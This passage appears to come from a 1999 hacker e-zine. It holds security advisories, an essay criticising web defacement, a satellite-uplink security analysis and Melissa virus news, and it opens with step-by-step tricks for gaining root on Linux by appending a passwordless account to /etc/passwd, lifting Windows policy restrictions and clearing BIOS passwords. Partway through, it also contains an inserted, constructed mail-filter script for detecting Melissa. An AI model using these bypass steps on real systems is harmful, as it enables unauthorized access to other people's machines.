manicx::0:0:new root account:/root:/bin/bash
(hit ctrl+d to get out of cat)
sync (just to bring your files up to date)
reboot and login with your new root account called manicx (no password)

System: Linux (with local access)
Gives a root shell / root account
Boot with the rescue.img available on most linux distro cd's
voila one root shell
you will probably have to mount your linux partition (hda5 is the partition might be hda2 > hda7)
mkdir /linux
mount /dev/hda5 /linux
cat >> /linux/etc/passwd
manicx::0:0:new root account:/root:/bin/bash
(hit ctrl+d to get out of cat)
sync (just to bring your files up to date)
reboot and login with your new root account called manicx (no password)

System: Windows
Remove All policy restrictions
Open regedit
Scroll down to : HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies
Anything with a value of "1" is turned ON so double click on it and change the value to "0" to turn it OFF
(Or if you can't be arsed just delete them. It's best to note changes and change them back when you're finished)
When you're finished just exit; you should now have access to all the restricted commands (run/dosprompt/control_panel/etc)
(Win98- You will probably have to reboot before the changes take effect)

System: Windows 95
Close down the start menu :þ
Double click the [Start] button, so it's got a black dotted line on it (this means it's got focus)
hit alt and - (minus key) at the same time, voila you can now move or close the startmenu

System: Windows
Gets rid of BIOS password (and resets CMOS settings)
killcmos.zip
Or
Pull out the cmos battery for 5-10 mins (you need to know the setup)

System: Windows
Get past any password protection before boot-up
Try booting from a floppy or holding down the shift key during startup

@HWA

08.0 NT4 index server 2.0 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 23 Mar 1999 23:40:55 -0000
From: Mnemonix
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Index Server 2.0 and the Registry

When Microsoft's Index Server 2.0 is installed on NT 4 with Internet Information Server 4 it opens a new "AllowedPath" into the Windows NT Registry.

Administrators can control who can access the Windows NT Registry via the network by editing permissions on the Winreg key found under

HKLM\SYSTEM\CurrentControlSet\Control\SecurePipeServers\Winreg

By default, on NT Server 4, the permissions on this key are set to Administrators with Full Control. No-one else should have access (although it doesn't really work out like this in the end.) There are certain paths through the Registry that remote users, whether they are Administrators or not, may access. These are listed in the AllowedPaths subkey found under the Winreg key. These paths are to allow basic network operations such as printing etc to continue as normal.

Index Server 2.0 creates a new "AllowedPath":

HKLM\System\CurrentControlset\Control\ContentIndex\Catalogs

meaning that anyone with a local or domain account for that machine, including Guests, is able to discover the physical path to directories being indexed or, if a directory found in a network share is being indexed, they can learn the name of the machine on which the share resides and the name of the user account used to access that share on behalf of Index and Internet Information Server. Permissions on the above key and its sub-key give Everyone read access.

Note that regedit and regedt32 can not be used to access this information. Tools such as reg.exe or home-baked efforts must be used.

In most cases this issue represents a mild risk, but one worth noting and resolving by removing if this adversely affects you and your security policy.

Cheers,
David Litchfield
http://www.infowar.co.uk/mnemonix/

@HWA

09.0 Yahoo news ticker has plaintext passwords in config files...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

FOR IMMEDIATE RELEASE:

Application: Yahoo! NEWS TICKER
Platforms : Win95,98,NT

Advisory: The installation process of the Yahoo! NEWS TICKER leaves a file named "install.log" in the program directory. The file contains plaintext userid and password. The installation process also sets registry entries under hkey_local_machine/software/netcontrols/ticker that contain the plaintext userID and password. Each yahoo account uses the same password/userid for all parts including auctions, news, my.yahoo, classifieds, and most importantly, EMAIL!!!!

This is an independent finding, not a release by Yahoo!.

Advisory by CSB 24MARCH99

@HWA

10.0 Defacing websites? read this from bufferoverflow/attrition.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# mv index.new index.html
# echo "03.20.99"
# echo "I do not advocate web defacement or intrusive hacking."

Introduction
The Ends Justify The Means.
My Rant In Plain English.
Justification
Suggestions For Improving Your Hacked Pages.
The Good, The Bad, and The Impressive.

Introduction

Browsing the web, enjoying your time, nothing better to do. Casual search for something interesting to read, or maybe even a little research for a project or term paper. Click here, click there, link from site to site. Some mostly worthless, nothing more than links to other pages. Same old thing, different day.. until today. You typed in the URL for a web page that promised to have your info. Instead of computer pricing or biology, you found a cryptic message scrawled out claiming something, hell if you could tell what it was. You click on and forget about it.

Yes, that was a hacked web page. One of the favored things of crackers to boast their deeds. Proof that they alone control the universe and 'own' someone else's computers. Self reasoning and a shoddy moral vindication of a petty break-in to some no name computer.
At least, that sums up almost 99% of current web defacement activities. Why?

The Ends Justify The Means.

Ok, let's buy that argument for now. The 'means' in our case is the hacking of a site and the 'ends' constitutes replacement of the existing web page with a new 'improved' page carrying the hacker's message. In today's digital world, it is the equivalent of spray painting a wall to have your message seen by passersby.

Stop here and think about all of the spraypaint graffiti you have seen in the last six months. How much can you remember? Odd isn't it. Some person took the time and effort to break the law in order to get their message out. Risk possible incarceration for words or ideas they felt were important, yet you can't remember any (or all) of it. Why?

Simple answer. Because there was no real message worth reading. After taking the power of free speech into their hands, after finding a place to stand on a soapbox, the person stood up only to mumble to a handful of faithful followers that already know the message. And boy, do they love to hear you talk! The rest of the passersby continue on, unconcerned. They still don't know what you are trying to say. In fact, their opinion of you has gone down because you took the time to get a soapbox, stand on it, and face the public. You flaked out and didn't broadcast a meaningful message, therefore you are worth no time or thought. And there you go, a passing inattention in a fast moving world. Congrats.

My Rant in Plain English

In the past few years, over one thousand web pages have been hacked. Their content has been replaced with whatever hasty rant has popped into mind by the cracker. With few exceptions, arbitrary low traffic and no name domains are 'chosen' by these crackers to put up their message. Some of these sites get more traffic from the hack than a previous month of regular visitors they are so low key.
The truth is, these kids(1) have delusions of grandeur in a networked world that could give a second thought about them. Their message is meaningless drivel that only impresses other kids for the most part. Web viewers walk away from seeing their "message" thinking immature social rejects plague the net, and they think so for damn good reasons.

More and more sites are being replaced by poorly designed pages, chock full of misspelled words forming sentences that defy all rules of grammar. Pages full of "elite speak"(2) that prove absolutely nothing, have no humor value, and only contribute to more eye strain. Pages containing poorly written rants that form incoherent thoughts, opinions or reasons as to why the page was altered in the first place. Basically, dull pages that show a complete lack of intelligence and no creativity whatsoever. These kids have a chance to show the world that they are indeed intelligent well balanced *mature* net users, yet they throw every chance away it seems.

(1) I use the word kids because more times than not, they ARE kids. Fifteen to Eighteen year olds that don't quite have a concept of how things work. In the cases where they are over eighteen, it is often difficult to tell based on the content of the altered pages. Don't like the use of the word 'kid'? Do a better job hacking these pages.

(2) Elite speak being the oh-so-old replacement of alternate characters to spell words. t|-|1s TyP3 0f +3xt.

Justification

It seems most hackers want/need to justify their actions, be it to the admin of the site they broke into, the people reading the pages, their friends or often times themselves. Regardless of who they are trying to vindicate themselves to, the reasoning falls apart every time.

Justification #1: "I'm doing you a favor.. this could have been a malicious hacker that damaged your system!".

Gee thanks for breaking in to tell me that. It didn't occur to you that the other 80 MILLION internet users did me a favor by not breaking in?
Yet I should thank you? Although these kids rarely do damage, they cause the administrator extra grief in one form or another. Rather than normal work, they are forced into doing a full security audit of their system or reinstalling from scratch. Yes, maybe they should have been more concerned with security before this, but it is a rare site that can dedicate that kind of time or resource to staying up to date on the bleeding edge. That is the way the world works, so deal with it. Oh, and don't try to use that as a justification.

Justification #2: "Because we can!"

Ok, so if I shoot you in the knee 'just because I can', does that teach you any real lesson? Amazingly enough, this is about the only justification that holds any water. If nothing else, it is the brutally honest truth that the person had nothing better to do, and had no well grounded reason for their actions. Instead of using this as a justification, why not think of a truly noble cause and follow it?

Justification #3: "I was pointing out security holes on your site!"

Gee, thanks for the free security audit. Not. While you did indeed prove there was a hole, did you mail the administrator telling him HOW you broke in? How to fix it? Did you find more than one way into the system or just the one? If you did none of that, you weren't even close to performing a security audit. Oh, audits require permission too. Bad reason.

Justification #4: "Read my political reasons yo!"

This one almost works for me, but like the others has serious shortcomings. If your true reason is to impress upon your readers of some political or moral agenda, did you really do it? A good job of it? Did you sit down and research your topic, finding resources and legitimate sources of information to leak to? Did you write up a political rant and place it on an appropriate system? Did you spell check your work to make sure that it flowed reasonably well? Doubtful.
Putting up third grade level rants on www.unrelated.com means just about nothing and truly fails as a justification. Try again.

Suggestions For Improving Your Hacked Pages.

I am not one to complain about a problem without offering some solution or input to offset the bitching. However, with this comes the chance people will blame me for encouraging hacking and continued defacement of web pages. I do NOT condone any such thing! I am practical and realize that nothing I say will stop people from doing it. That in mind, I am just trying to make the best out of an existing situation. That said... here are my top 10 suggestions for future hacked pages.

1. Better designed pages! Hackers and crackers are said to be creative. You sure wouldn't know it looking at many of these pages. Take your time and DESIGN the web page you are putting up. Make it aesthetically appealing to both lynx and graphical browsers. Why do companies spend all the time on beautiful pages in the first place?

2. Better messages! You are cracking these machines and replacing pages to "get your message out". Err, ok, what is your message? Remember that people are visiting with no prior knowledge of you, your message, or your cause. Be clear and concise and spell out your message for them.

3. No more elite speak crap. If you want to impress people with alternate characters, offer the hacked page in several languages. I for one would love to know what some of the hacked pages in Mexico say, and I would also bet that foreign hackers would love to read American hacks in their tongue. Surely you know someone who can translate to German, French, Latin, Russian or more impressive, Japanese. :)

4. You want to use 'elite' speak? Try grammar, spelling, and punctuation. A well written paragraph will command more respect than any substitute character will. If you misspell common words, how can anyone take you seriously? Do you find yourself falling behind in English classes? Use the net to help you!
You may find online resources like a dictionary or thesaurus an invaluable tool.

5. Help the site! After all, you embarrassed them and caused them some kind of hassle. After breaking in and changing their web page, why not temporarily patch the hole/bug in the system that gave you access? Better, patch it and tell what you exploited to get in on the web page. Let other admins learn that these holes are actively being exploited. Link to information on more permanent solutions to their security problem. That is at least half way noble.

6. Back up the main page for them! Rather than overwriting their index.html and relying on them to have a copy, just rename the old one. From your new page, link to the old one and give customers a chance to reach the information they were looking for. They had to read your message to get to it, your job is done.

7. Show knowledge of computers! Creating your hacked web pages with editors like 'FrontPage Express' isn't exactly conducive to propagating the myth that hackers know the system. If you can't write out a basic web page in a simple editor like 'vi', 'pico', or 'DOS edit', you should probably learn HTML before worrying about other people's systems.

8. Target your hacks! Don't change the page of any arbitrary domain you happen to stumble across. Pick a system you feel that needs a face lift and apply it to that system only.

9. Don't actually carry out the mass hack! If you find yourself in the position of being able to change pages on multiple domains, don't. Just pick the highest traffic domain, or biggest name and change that one. On your hacked page link to a list of other domains that could have been affected.

10. Choosing a name! Try to be mature when choosing a name. Everyone realizes that some names are quite humorous, but remember who reads these pages. Making a profound statement and backing it by "tHe SiNgAlOnG gAnG!@$#$@" just isn't very cool.

The Good, The Bad, and The Impressive.

The good, the bad, and the impressive.
In the past, there have been pages (more like *elements* of pages) that have stood out as creative, amusing, or to the point. Hopefully by pointing out these examples you will begin to see what I have been attempting to convey.

The Good

Humor: While it probably wasn't the best site to hit, the recent hack of Greenpeace had a certain dark (and sick) sense of humor behind it.

Interesting: Another new person/group to hit the scene recently is 'Redemption'. Their hacks to date have simply contained (apparent) original poetry. A sign of creativity at last! You can read their work from hacks like DaytonTech, Town Green, and TC Edge.

Targeted: As suggested above, targeting specific domains in order to spread a specific message is a good thing. Examples of this can be found in Monica Lewinsky's Future Site, White Pride, and Ku Klux Klan.

Political: Probably the most memorable and well done hack was that of the 'Human Rights China' site. When hacking for political agendas, hit the right site, with the right message, and present a well written argument. Does wonders. Don't believe me? Check out the www.humanrights-china.org hack.

The Bad

Bad: Amnesty International found themselves victim of a web page defacement. Of all the sites on the net, why hit groups that are trying to do good already? Isn't that somewhat defeating?

Pathetic: The various hacks for a short period of time carried out by 'zyklon' of LoU. These hacks (many movie home pages) turned out to be one or two lines of broken English followed by a dedication to his girlfriend. *yawn* Kiddies with no creativity.

Pathetic: The recent mass hack by the 'Miss Piggy Hackclub', which caused over one hundred domains to display a single line: "The Miss Piggy Hackclub Strikes again muthafuqErz!$##$!@" *yawn* That is almost worth reading.

The Impressive

None! There hasn't been a truly impressive web page defacement to come along. None that took the cake in site, message, and design.
:(

by whoever (whoever@attrition.org)

(c)opyright 1999 - This piece protected by U.S. copyright and may not be copied without the express written permission of 'whoever@attrition.org' or representing parties of said address. Permission is granted to repost this work in full on any *non-profit* site or mail list.

Disclaimer: I do not advocate web defacement. Don't do it. Go learn to program or be creative in better capacities.

-EOF

@HWA

11.0 Security analysis of Satellite command uplinks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security Analysis of Satellite Command and Control Uplinks
By Brian Oblivion, L0pht Heavy Industries
mailto:oblivion@l0pht.com

With every passing day we are becoming aware of the fragile link between technology and modern society. Many critical information paths flow over satellites orbiting our earth. A box floating in space seems to be a likely target for hacker groups or renegade nation-states. As sensational as such a satellite takeover would be, it is highly unlikely. These satellites cost millions of dollars, and an adequate sum of money is devoted to make sure it remains under the control of the intended parties.

This document attempts to perform an analysis of security methods used by Government/Military Ground Stations. This information is a summation and review of open-source non-classified information taken from the Internet and other printed sources. Most information is from NASA operations procedures, however, references from those procedures influence/are influenced by military SATCOM standard operating procedures.

There are two methods of compromising a satellite by an external threat vector.* One is an attack directly on the Satellite by a rogue Ground Station. The second is an attack on the Master Ground Station (MGS), which houses the command and control (C&C) Uplink, and various access control equipment.
An outside attacker may not have all the resources necessary to attack the C&C uplink such as the equipment that encodes the commands and the transmission to the spacecraft. This driving factor makes the assault on the MGS all the more appealing.

A great deal of work has been put into securing the C&C Uplink. The spacecraft command processor authenticates every command sent to it. The C&C data is often encrypted and decrypted in the spacecraft. The downlink is often unencrypted, however, in the military arena, this is often encrypted as well. Various transmission modes can be used but in the military/government arena spread spectrum (SS) or frequency hopping (FH) is generally employed using secure spreading or hopping sequences. SS and FH are used due to their anti-jamming and low probability of intercept characteristics.

In the unlikely event a rogue Ground Station actually acquired the sequence to get a command burst to the satellite, the MGS would begin to receive telemetry indicating that a command channel is being accessed. Responses from the satellite to the rogue Ground Station would be received at both locations. The MGS would see a response to a request it did not send and a flag would be raised at which point contingency plans would be set in motion. It would also be very difficult for a rogue Ground Station to supply the proper command sequence field, unless the MGS is being monitored. Highly unlikely in the case of the armchair hacker, point and clicking his way to telecommunications Godhood.

By far the path of least resistance is obtaining control through compromising the security of the MGS. While long term control may not be achievable, there is the possibility of spoofing a command message to the uplink operators and having them pass that information to the satellite. Scientific Exploration and commercial satellites usually conform to the CCSDS telecommand frames and the military/government uses something similar.
Information on these command frames and command syntax is available through the Internet.

A set of checks and balances exist within the MGS. If a command request exceeds pre-defined parameters, the command is flagged and escalated to an authority to determine the nature of the exception. Interception, modification, and re-submission of a command message is of the greatest risk. However, the attacker would require an in-depth knowledge of the target system and have knowledge of the normal operational parameters so exceptions would not be flagged, revealing his presence.

Once a command is determined valid by the spacecraft command processor, the command is sent back to verify the proper command was indeed received and awaits acknowledgement. Further analysis of the command processor and actual checks performed on the sequence and syntax of commands received are beyond the scope of this document. Due to these checks, one command sending the satellite spiraling out of orbit is just not possible without the addition of catastrophic equipment failure.

Remember that satellite position is also tracked by third parties. In the event that a satellite makes a change in course, the MGS of that satellite would be immediately notified. There are other checks in place that monitor the heartbeat of a satellite. Should that satellite move, its associated beam spot would become disturbed resulting in loss or degradation of communications.

There are overrides to the normal safeguards for emergency spacecraft commanding. As long as an override provision exists, there is the possibility of the exploitation of that provision. However, the override can only be engaged by onsite MGS personnel. Manual overrides are a requirement for every MGS. In the event that the computerized frontend is compromised in some fashion, be it of malicious intent or equipment failure, commands can be relayed to the spacecraft directly from manual command consoles.

The nature of Satellite communications often dictates that Ground Stations are not necessarily located in the most convenient locations. Quite often they are located in remote regions and/or at sea. This requires a distributed networking architecture as well as interoperability definitions. NASA in particular has been moving from its highly proprietary legacy systems to more commercial-off-the-shelf (COTS) hardware. One must realize this obscurity once provided additional security to the network. The current trend in commercial security offerings is a reactionary role to security management. Holes remain to be identified until the units are shipped to the end user and often not found until the device is in operation.

Some MGS's are known to be connected to live internetworked nets. These nets are often treated as sensitive, yet unclassified, to support interoperability. Security policy governing the nature of the systems which are hosted by the satellites define the security of the MGS network. Where interoperability is not an issue, without physical access to the MGS, your chances are remote to compromise the system.

Institutional security policy sets directives in employing firewalls and restrictive routers. Intrusion detection systems may also be employed between closed networks. SecurID, kerberos, and biometric access controls are found throughout the commercial/government/military access controls. Access is usually restricted by IP address. Firewalls and routers have been known to be accidentally misconfigured, and often remain that way for lengthy periods of time due to inadequate penetration testing and security fault analysis. An offline proof-of-concept security prototyping lab is a requirement for integrating a new access control system into the operational environment. A good institutional security policy will require such facilities.

Many safeguards have been built into the existing C&C uplinks.
Key management systems are classified, as is information on implementation of cryptographic systems used. There may be holes in the implementation, but with the other safeguards, the chances of successfully undermining the o security mechanisms is slim. One can never underestimate the human factor in these systems. To poke holes in security policy is human. Hopefully this article shed light onto the criteria which may lead to MGS compromise and direct satellite C&C uplink attack. The chances of something along these lines actually happening without new techniques or heretofore unknown methods being employed, is remote, but not impossible.

----------------------------------------------------

* A third attack vector could be an attack from within. Poisoning the flight software on the satellite, or the software used to interact with the satellite, bypassing required security provisions. Code review could diminish this threat.

@HWA

12.0 Melissa virus makes it hard for Microsoft users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Bad Girl Melissa Overloads Networks
Contributed by Adam

IT Managers around the world will wake up Monday morning to overloaded email servers as a new MS Word Macro Virus/Worm spreads across the internet. "Melissa" attacks users of MS Outlook by grabbing up to fifty addresses from an Outlook address book and automatically sends copies of itself as an MS Word attachment to unsuspecting victims. While the virus/worm does not seem to intentionally cause damage the flood of email that it generates is enough to bog down servers essentially causing a major denial of service. Users who do not use Microsoft products will not be affected. 
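An added example, not from HNN or any of the quoted articles: a mail-store check for the subject lines, body text and attachment types that the reports on this page quote for Melissa, Mad cow joke and Papa. The sample messages, addresses and the two confidence levels are constructed assumptions.

```python
"""Added example: flag mail matching the Melissa-family indicators quoted in
the news reports. Sample messages are constructed; no real mail is used."""
import email
import re
from email import policy
from email.message import EmailMessage

# (family, subject regex, body phrase after normalisation, attachment suffix)
# Subject lines, body text and file types are the ones the reports quote.
SIGNATURES = [
    ("Melissa", r"^important message from\b",
     "hereisthatdocumentyouaskedfor", ".doc"),
    ("Mad cow joke", r"^mad cow joke$",
     "bewareofthespeedofthemadcow", ".doc"),
    ("Papa", r"^fwd: workbook from all\.net and fred cohen$",
     "urgentinfoinsidedisregardmacrowarning", ".xls"),
]


def squash(text):
    """Lower-case and drop everything but letters and digits, so spacing and
    punctuation differences between copies of the text do not matter."""
    return re.sub(r"[^a-z0-9]", "", text.lower())


def classify(raw_message):
    """Return [(family, confidence)] for one RFC 822 message given as text."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    subject = str(msg.get("Subject", "")).strip().lower()
    body_part = msg.get_body(preferencelist=("plain",))
    body = squash(body_part.get_content()) if body_part is not None else ""
    names = [(part.get_filename() or "").lower()
             for part in msg.iter_attachments()]
    hits = []
    for family, subject_re, phrase, suffix in SIGNATURES:
        # The macro travels in the attached document: no attachment, no hit.
        if not any(name.endswith(suffix) for name in names):
            continue
        matched = [bool(re.search(subject_re, subject)), phrase in body]
        if all(matched):
            hits.append((family, "high"))
        elif any(matched):
            hits.append((family, "low"))   # one indicator alone: review by hand
    return hits


def build(subject, body, attachment=None):
    """Constructed sample message, serialised the way a mail store holds it."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "recipient@example.com"
    msg["Subject"] = subject
    msg.set_content(body)
    if attachment:
        msg.add_attachment(b"placeholder bytes, not a real document",
                           maintype="application", subtype="octet-stream",
                           filename=attachment)
    return msg.as_string()


# Constructed samples. The two Melissa bodies differ only in spacing, as the
# quoted reports do.
SAMPLES = {
    "melissa": build(
        "Important Message From Pat Example",
        "Here is that document you asked for ... don't show anyone else ;-)",
        "list.doc"),
    "melissa_tight": build(
        "Important Message From Pat Example",
        "Here is that document you asked for... don't show anyone else;-)",
        "list.doc"),
    "hr_notice": build(
        "Important message from HR",
        "Benefits enrollment opens Monday.", "benefits.doc"),
    "papa": build(
        "Fwd: Workbook from all.net and Fred Cohen",
        "Urgent info inside. Disregard macro warning.", "path.xls"),
    "warning_no_attachment": build(
        "Virus warning",
        "Delete mail that says: Here is that document you asked for"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, classify(raw))
```

The `hr_notice` sample shows why the subject line alone is only a low-confidence hit: an ordinary memo with a Word attachment can share it.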
Forbes.........http://www.forbes.com/tool/html/99/mar/0326/side1.htm
ZD Net.........http://www.zdnet.com/zdnn/stories/news/0,4586,2233030,00.html
Info World.....http://www.infoworld.com/cgi-bin/displayStory.pl?990326.wcvirus.htm
NY Times.......http://www.nytimes.com/library/tech/99/03/biztech/articles/28virus.html
C | Net........http://www.news.com/News/Item/0,4,34334,00.html?st.ne.fd.gif.e
Nando Times....http://www.techserver.com/story/body/0,1634,32453-52253-387209-0,00.html

The Forbes and Nando Times stories follow;

From Forbes http://www.forbes.com/tool/html/99/mar/0326/side1.htm

Porn virus hits Corporate America
By Adam L. Penenberg with Elizabeth Corcoran

A number of companies--including Microsoft, Compaq, Intel and Boeing--have been infected by a new computer virus that attacks users of the Microsoft Outlook E-mail program. The virus, dubbed "Melissa," was first cataloged today, March 26, by McAfee on its web site. The virus is spreading rapidly and, because of its design, is jamming E-mail gateways and causing system administrators to shut down. Since the virus was uncorked just before the weekend, when IT staff are away from work, the full extent of the damage may not be known for some time, although it is certain that many more companies--and individuals--will fall victim. If you are listed in someone's Outlook Express address book, and he is infected, then you could be affected--if you open the attached MSWord file. "Getting rid of this will take a long time, because it only takes one message to start it all over again," says Barry Wadman, president of C-Systems, an E-commerce designer. "I venture to say that this will be affecting and or infecting the net for at least a couple of weeks." Intel, according to PR manager Tom Waldrop, has ordered those who have received the virus to shut down their machines. "The IT staff is working hard to make sure that infected machines are cleaned appropriately," he says. 
Melissa is a Word Macro Virus that is spread when a user opens an attached Microsoft Word file. Upon activation, it looks for Outlook--Microsoft's E-mail, newsreader and personal information manager--creates a message, and sends it to the first 50 people listed in the user's address book. Each message contains the subject: "Important Message From (Your User Name)." The body of the E-mail simply says, "Here is that document you asked for ... don't show anyone else ;-)" When users click on the attached file, they unleash the virus. The attached file contains a list of 300 porno sites--passed on as if the sender is pointing people to XXX porno sites. It also modifies the normal template in MS Word, infecting every new document that the user creates with Word. The virus is not malevolent, meaning it does not destroy or alter data, or trash hard drives. But it is fiendish because of the intense volume of E-mail it produces, which is causing networks to choke. Only users of Microsoft Outlook are affected by the Melissa virus. Macintosh users and those using other E-mail programs have nothing to worry about. "In the past people have always been told not to open attachments that come from people you do not know," says Space Rogue, publisher of Hacker News Network and a member of L0pht Heavy Industries, a Boston-based hacker think tank. "Well, here is a virus that is sent as an attachment from someone you do know." The Melissa virus seems to be one of the few with a utilitarian purpose. Since the virus spreads so quickly, it "would definitely be a great spam vehicle," says Dildog, another member of L0pht. Most spam points recipients at porn sites and get-rich-quick scams. That typical spam is easily traced back to its source, since the spammer usually includes a web site, phone number or E-mail address. 
But the Melissa virus, by automatically spewing out a list of 300 sites, makes tracing the creator extremely difficult. Comments inside the virus include: 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! The best way to stop the virus? Be suspicious of mail with attachments and the subject line: "Important Message From (Your User Name)" From Nando Times; http://www.techserver.com/story/body/0,1634,32453-52253-387209-0,00.html 'Melissa' virus hits Internet Copyright © 1999 Nando Media Copyright © 1999 Reuters News Service By DICK SATRAN SAN FRANCISCO (March 28, 1999 4:34 p.m. EST http://www.nandotimes.com) - A virus that spreads via e-mail hit computers over the weekend and threatened havoc Monday as workers return to offices and begin opening messages sent over the Internet. The virus, called "Melissa," comes in the form of a document that lists pornography sites on the World Wide Web. Computer experts said the virus was aimed at widely used Microsoft Windows-based e-mail address book software, Outlook and Outlook Express, and it can send up to 50 additional versions of the e-mail to other users, threatening a widespread infection of computer systems. That could create a flood of unwanted e-mails around the Internet as the program perpetuates itself using pre-programmed "macros," software embedded in the Windows operating system that sets off complex computer functions with one command. "It could grow explosively and shut down e-mail systems as a side effect," Eric Allman, co-founder of the Emeryville, Calif.-based Sendmail, a widely used provider of e-mail services, said in an interview Sunday. A number of leading software security firms and academic experts posted warnings about the e-mail threat, including Network Associates, the leading anti-virus software maker. 
"Melissa is widely reported and spreading quickly via mass e-mail, a function of the viral infection," said Network Associates based in Santa Clara, Calif. Carnegie Mellon University's Software Engineering Institute issued an advisory, which said, "The number and variety of reports we have received indicate that this is a widespread attack affecting a variety of sites." The only damage the virus causes is that it replicates itself and creates a flood of e-mail, though it apparently does not hurt the computer itself, experts said. The real danger is that the virus will overwhelm the server computers that handle computer messaging systems, which could lead to system shutdowns as each e-mail multiplies itself 50 times. Already, a wave of the e-mails has been sent out and awaits office workers Monday morning. "It's not doing malicious things or removing files or anything like that," Allman said. "I've heard claims that it has been doing more but I haven't seen any substantial verification of that. It's really more of a wake-up call, that shows us how you could take a malicious virulent virus and reproduce it all over the place very quickly." Computer experts warned users to be wary of documents sent from any senders asking them to open up a file for Microsoft Word. That file, in turn, asks for a prompt asking users whether they want to initiate a "macro," and requires users to approve its use. Those checkoffs make it relatively easy to avoid the problem. Microsoft itself has simply warned users to "be careful about what runs on their machine," the New York Times reported. Carnegie Mellon said, "our analysis indicates that human action (in the form of a user opening an infected Word document) is required for this virus to activate." The virus can be identified, Network Associates said, because it will read "Important Message From Application.UserName." The body of the text reads "Here is that document you asked for ... 
don't show anyone else" and contains a list of pornographic Web sites. Melissa creates the following entry in the registry: HKEY_CURRENT_USER/Software/Microsoft/Office/"Melissa?" Network Security said that to avoid the risk of contracting the Melissa virus, "it is recommended that network administrators and users upgrade their anti-virus software to include detection and cleaning for W97M/Melissa." Network Security posted information about the virus on the Web site of its Avert Labs division, Sendmail also posted advice on the Melissa problem at http://www.sendmail.com and Carnegie Mellon posted information on its Web site as well. Computer experts said that if advisories were followed, the problem would probably not become a widespread worry. "I suspect we'll see a day or two of extremely high e-mail loads and then it will just die out, so in some sense this virus is not that critical but it's one that demonstrates what could happen if a truly malicious virus were released," Sendmail's Allman said. "The ability to spread something so broadly is scary."

FBI, experts search for elusive author of 'Melissa' virus
March 30, 1999 Web posted at: 10:47 p.m. EST (0347 GMT)
http://www.cnn.com/TECH/computing/9903/30/virus.tracker/index.html

WASHINGTON (CNN) -- Several mutations of the computer virus known as Melissa surfaced Tuesday, although experts said they were not as effective as the original in clogging e-mail systems. The FBI has launched an investigation into the fast-spreading virus, which first appeared last Friday and spread rapidly around the world by Monday. The agency estimated that the virus has affected "thousands of computer users" at more than 100 companies and government agencies. "I urge e-mail users to exercise caution when reading their e-mail for the next few days and to bring unusual messages to the attention of their system administrator," said Michael A. Vatis, director of the FBI's National Infrastructure Protection Center (NIPC). 
NIPC is a multiagency unit focusing on threats to the nation's infrastructure, including computers and telephone, electric and water systems. The Melissa virus spreads via Microsoft's widely used Word 97 and Word 2000 documents which can be attached to e-mail messages. The Melissa virus comes in the form of e-mail, usually containing the subject line "Important Message." It appears to be from a friend or colleague. The body of the e-mail message says, "Here is that document you asked for ... don't show it to anyone else" with a winking smiley face formed by the punctuation marks ;-). Attached to the message is a Microsoft Word document file that lists Internet pornography sites. Once the user opens that file, the virus digs into the user's Microsoft Outlook address book and sends infected documents to the first 50 addresses.

Computer sleuth tracks down virus source

As the virus swamped one computer system after another over the weekend, software developer Richard Smith followed a trail of electronic fingerprints left by Melissa. "This electronic fingerprint is basically the serial number of your computer. So what I was curious about is whether it would be possible to use the serial number in the Melissa document ... to track down the author," said Smith, who runs Phar Lap Software, a small Cambridge, Massachusetts, software firm that makes operating systems and software tools. Smith posted his "digital fingerprinting" theory on an Internet discussion group Friday. He received an e-mail from a college student in Sweden who pointed out similarities between Melissa and older viruses written by a computer user known as "VicodinES." Smith was familiar with other work attributed to the notorious VicodinES, named after the painkiller drug Vicodin. The same user had posted so-called "virus creation tool kits" on the Web. "In about 30 percent of those files, I found that same fingerprint number, the same serial number that was in the Melissa virus ... 
at a minimum, we know that the Melissa virus and these tool kits were created on the same computer," Smith said.

Threat remains

Smith said he turned his findings over to the FBI, who regard the transmission of the virus as a criminal matter. But the biggest impact of the Melissa virus appeared to be the temporary shutdown of massive computer systems by cautious managers. Computer giants Microsoft and Intel were among those who received copies of the tainted note, as did Lucent Technologies, the world's largest communications equipment maker. And although anti-virus software programs have so far been successful in containing Melissa, experts fear its variants will be corrected and distributed by copycat virus writers. Indeed, a potentially more damaging virus code-named "Papa" emerged on Monday. The new virus is a more elaborate program that uses the same e-mail system as Melissa.

Correspondent Marsha Walton, The Associated Press and Reuters contributed to this report.

@HWA

12.1 The Melissa macro virus code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 26 Mar 1999 17:05:51 -0800
From: Aleph One
To: BUGTRAQ@netspace.org
Subject: Melissa Macro Virus

I normally don't allow virus posts through the list as they seldom represent a new threat, just a new example of an already existing one, but this one is getting enough play to warrant a message. There is a new Word macro virus circulating called Melissa. The virus propagates via email. Attached to the email is a Word file that when opened will launch a macro that will send the same message to the first 50 recipients of your Outlook address book. The subject line is "important Message From ". The body consists of the text "Here is that document you asked for... don't show anyone else;-)". The infected documents contain passwords to porn web sites. 
